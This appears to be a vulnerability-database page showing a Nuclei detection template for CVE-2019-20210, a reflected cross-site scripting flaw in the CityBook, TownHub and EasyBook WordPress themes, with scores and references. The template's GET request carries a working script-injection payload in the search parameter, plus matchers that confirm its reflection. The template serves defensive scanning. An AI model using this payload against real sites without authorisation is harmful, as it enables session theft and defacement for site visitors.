Lucene search
+L

WordPress CTHthemes - Cross-Site Scripting

🗓️ 25 Sep 2026 02:05:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

WordPress CTHthemes CityBook, TownHub, EasyBook themes cross-site scriptin

Related
Refs
Code
id: CVE-2019-20210

info:
  name: WordPress CTHthemes - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
  impact: |
    Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system.
  remediation: |
    Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/10013
    - https://wpvulndb.com/vulnerabilities/10018
    - https://cxsecurity.com/issue/WLB-2019120112
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
    - https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-20210
    cwe-id: CWE-79
    epss-score: 0.03243
    epss-percentile: 0.87782
    cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: cththemes
    product: citybook
    framework: wordpress
  tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
          - "/wp-content/themes/citybook"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d3833e0695063109e670e4c8e5a6d6bfadb7cd10f46dcbdf31c164aba7a8577e0220052cd0d27f8239313814842ce442da94417c9ee9baa347347665ac31dc96c005:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.03243
44